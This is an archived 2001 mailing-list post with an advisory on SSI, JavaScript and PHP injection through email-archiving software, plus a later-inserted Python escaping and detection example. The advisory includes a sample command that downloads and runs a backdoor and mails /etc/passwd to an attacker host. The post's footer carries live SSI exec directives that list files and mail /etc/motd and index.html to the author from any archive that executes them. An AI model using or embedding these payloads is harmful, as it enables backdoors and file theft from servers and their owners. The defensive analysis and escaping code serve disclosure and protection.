Hello,

Below is something I wrote in regard to the threats that email archiving software/tools can bring.

# MHonArc
# email to html converter; while not vulnerable itself,
# most people use it to convert/display information for archived
# lists. (VULNERABLE/TESTED)
# Could be exploited via javascript insertion from an img tag
# and possibly others. (See Georgi Guninski's examples)
http://www.oac.uci.edu/indiv/ehood/mhonarc.html

While this product itself doesn't have a hole in it, it is often used to help translate mail for other archiving software. I've seen in some examples that email was translated with this tool and archived with other software, and html tags were translated/executed as normal. Could be exploited via javascript insertion from an img tag and possibly others. (See Georgi Guninski's examples)

I haven't had the time to test a lot of other products.

Comments, Ideas, blah?

Author: Zenomorph adminat_private

Email Archives may allow Distributed Attacks against users and Web servers

I Introduction

Mailing lists are often archived for later viewing on websites. The software that archives these email messages may allow an attacker to execute commands, include false information, cause a wide scale browser DOS, and other possibilities. Millions of sites archive these mailing lists, and each site archiving a malicious post could either be attacked or help launch an attack.

II Examples:

Server Side Includes

If an attacker sends an email with a Server Side Include (SSI) tag, it may be possible to carry out the attack types listed below.

* (Client side) Including of large files, which may lead to a small Denial of Service of clients. (Bandwidth consumption, Memory consumption, etc...)
* (Client/Server side) Including of local files such as /dev/urandom, which will not only slow down the server and eat up bandwidth, but possibly DOS the client viewing the page.
* (Server side) Commands to get executed.
The server may execute the SSI request if the server is configured correctly. This could lead to possible web server compromise. With the right series of commands an attacker could download and install a backdoor with web server privileges. Below is an example to give you an idea.

id;wget http://host/backdoor.c;cc backdoor.c;./a.out <port to listen on>;mail attacker@host </etc/passwd;

(Just a random example)

Then the attacker would just need to telnet to the port specified within the trojan and he would be greeted by a shell with the user rights of the web server. With a local account an attacker could locally exploit your machine to gain administrative privileges.

Possible forging of other users' posts:

(A more advanced method, which would be on a mail archiving script basis. One would have to learn the output of a post along with its formatting, and then it may be possible to forge a reply from another user.)

Browser Denial of Service:

Some browsers have holes which can lead to either a browser or system crash. This would occur when an email had been sent with the proper HTML/JavaScript tags. The email would be archived. With some archiving software the HTML isn't stripped, and it is included on the website page you're viewing.

Malicious JavaScript/Java applets:

May be possible depending on browser security settings.

PHP Insertion:

May allow command execution or file includes depending on archiving software.

Other Markup Languages:

Any other markup language which may allow file includes, or command execution.

III Solutions:

* An example of a solution would be to program these archivers to add a slash whenever a < and > is present to help prevent execution of html/other. (Example: <b>hi</b> becomes <\b>hi<\/b> or becomes <\b/>hi<\/b/> )
* Removing the < and > altogether, but if program code or math is involved in the post it may remove important information.
* The best solution would be to print out the archives in txt format so no code can be executed.
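The escaping and plain-text ideas from the Solutions section, as an added example that is not part of the original post or of any archiver named in it: it uses standard HTML entity escaping (rather than the backslash idea) to emit a post as inert text, and adds a check that flags posts carrying SSI directives, javascript: URLs, script tags or PHP tags so the archive maintainer can review them. The pattern set and the sample post are constructed for this example.

```python
import html
import re

# Active-content patterns an archiver must never emit unescaped.
# Constructed for this example; covers the cases discussed in the post
# (SSI directives, javascript: URLs in attributes, script tags, PHP tags).
ACTIVE_CONTENT = {
    "ssi":    re.compile(r"<!--\s*#\s*(exec|include|echo|config|set|printenv|flastmod|fsize)\b", re.I),
    "js_url": re.compile(r"(?:src|href)\s*=\s*['\"]?\s*javascript:", re.I),
    "script": re.compile(r"<\s*script\b", re.I),
    "php":    re.compile(r"<\?(?:php\b|=)", re.I),
}


def find_active_content(body):
    """Return the names of the active-content patterns present in a raw post body."""
    return [name for name, pat in ACTIVE_CONTENT.items() if pat.search(body)]


def escape_for_archive(body):
    """Render a post body as inert text for inclusion in an HTML archive page.

    Every '&', '<', '>' and quote becomes an entity, so SSI comments, tags and
    attribute values survive only as visible text. Unlike stripping the
    brackets, code and math in the post stay readable for the viewer.
    """
    return "<pre>" + html.escape(body, quote=True) + "</pre>"


# Constructed sample post using the probe strings quoted in the original message.
SAMPLE_POST = (
    "Hi list, try this:\n"
    '<!--#exec cmd="ls -al"-->\n'
    "<img src=javascript:alert(document.domain)>\n"
    "if (a < b && b > c) { ... }\n"
)

if __name__ == "__main__":
    print("flagged:", find_active_content(SAMPLE_POST))
    print(escape_for_archive(SAMPLE_POST))
```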
Published to the Public October 2001
Copyright October 2001 Cgisecurity.com

EOF

Lame footer
******************************************************************
<!--#exec cmd="ls -al"-->
If you see a listing of files then this vendor is affected.

<img src=javascript:alert(document.domain)>
If you see a popup window then this vendor is affected.

<!--#exec cmd="mail bugtraqat_private < /etc/motd"-->
Attempt mailing me motd in case you're affected.

<!--#exec cmd="mail bugtraqat_private < index.html"-->
Attempt mailing me your index.html file for shits and giggles
******************************************************************
This archive was generated by hypermail 2b30 : Thu Oct 25 2001 - 08:48:07 PDT